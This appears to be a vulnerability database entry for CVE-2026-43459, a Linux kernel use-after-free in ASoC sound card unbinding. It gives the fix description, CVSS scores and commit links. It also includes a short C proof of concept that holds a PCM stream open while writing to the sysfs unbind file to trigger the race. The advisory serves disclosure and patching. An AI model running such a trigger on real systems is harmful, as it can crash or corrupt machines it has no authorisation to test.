Security Vulnerability Report
CVE-2026-43459 CVSS 7.3 HIGH


Published: 2026-05-08 15:16:59
Last Modified: 2026-05-11 08:16:15
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ASoC: soc-core: flush delayed work before removing DAIs and widgets

When a sound card is unbound while a PCM stream is open, a use-after-free can occur in snd_soc_dapm_stream_event(), called from the close_delayed_work workqueue handler.

During unbind, snd_soc_unbind_card() flushes delayed work and then calls soc_cleanup_card_resources(). Inside cleanup, snd_card_disconnect_sync() releases all PCM file descriptors, and the resulting PCM close path can call snd_soc_dapm_stream_stop() which schedules new delayed work with a pmdown_time timer delay. Since this happens after the flush in snd_soc_unbind_card(), the new work is not caught. soc_remove_link_components() then frees DAPM widgets before this work fires, leading to the use-after-free.

The existing flush in soc_free_pcm_runtime() also cannot help as it runs after soc_remove_link_components() has already freed the widgets.

Add a flush in soc_cleanup_card_resources() after snd_card_disconnect_sync() (after which no new PCM closes can schedule further delayed work) and before soc_remove_link_dais() and soc_remove_link_components() (which tear down the structures the delayed work accesses).

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Exploitability Score
1.3
Impact Score
5.9

Configurations (Affected Products)

No configuration data available.

Linux Kernel (versions before commit 231568afbc0c)
Linux Kernel (versions before commit 317a9298c54b)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * PoC concept for CVE-2026-43459
 * This code attempts to trigger the race condition by
 * keeping a PCM stream open while unbinding the driver.
 */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    /* Attempt to open a PCM device (e.g., default or hw:0,0) */
    int fd = open("/dev/snd/pcmC0D0p", O_RDWR);
    if (fd < 0) {
        perror("Failed to open PCM device");
        return 1;
    }
    printf("PCM device opened. Triggering unbind via sysfs...\n");

    /*
     * Trigger the unbind process (requires root/permissions).
     * This simulates the 'unbind' event mentioned in the CVE.
     * "sound_device_id" is a placeholder for the bound device's name;
     * the original wrote a fixed 14 bytes, which truncated the string.
     */
    const char *dev_id = "sound_device_id";
    int sysfs_fd = open("/sys/bus/platform/drivers/soc-audio/unbind", O_WRONLY);
    if (sysfs_fd >= 0) {   /* open() may legitimately return 0; the original tested > 0 */
        (void)write(sysfs_fd, dev_id, strlen(dev_id));
        close(sysfs_fd);
    }

    /* Keep the file open for a moment to allow the delayed work to race */
    sleep(1);
    close(fd);
    return 0;
}

References

https://git.kernel.org/stable/c/231568afbc0cd25b8fb2a94ebf9738eabe1cf007
https://git.kernel.org/stable/c/317a9298c54bb00319da73e5a7179f00e67fcbdf
https://git.kernel.org/stable/c/3887e514978d28216246360b46a9cb534969eb5a
https://git.kernel.org/stable/c/7d33e6140945482a07f8089ee86e13e02553ffdb
https://git.kernel.org/stable/c/95bc5c225513fc3c4ce169563fb5e3929fbb938b
https://git.kernel.org/stable/c/bf80a89da97285d9b877e0c6995e870d46b8025c
https://git.kernel.org/stable/c/c054f0607c8bb1b1aa529bc109e4149298a1cccd
https://git.kernel.org/stable/c/eab71e11ce2447c1e01809cbc11eab4234cf8dc8